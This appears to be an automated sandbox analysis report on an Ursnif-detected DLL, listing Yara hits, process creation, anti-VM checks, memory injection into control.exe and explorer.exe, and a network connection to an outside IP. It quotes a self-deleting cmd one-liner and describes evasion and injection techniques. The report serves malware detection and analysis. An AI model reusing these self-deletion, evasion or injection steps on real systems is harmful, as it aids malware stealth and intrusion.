                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5 Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6852Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6852Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5887Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3535Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0348BAD1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_034799BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_034765C2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0347FD47
                      Source: explorer.exe, 0000001D.00000000.464459722.0000000005454000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
                      Source: explorer.exe, 0000001D.00000000.433226771.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001D.00000000.433299138.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: RuntimeBroker.exe, 00000025.00000000.589637413.000001F9B9A61000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001D.00000000.461594936.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: e-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
                      Source: rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352389329.0000000003305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000001D.00000000.433299138.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 0000001D.00000000.461594936.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}on:Mondz?S
                      Source: explorer.exe, 0000001D.00000000.434588769.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,2_2_034786AD
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03478FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,2_2_03478FEC

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80Jump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF62CE012E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 4B0000Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF62CE012E0Jump to behavior
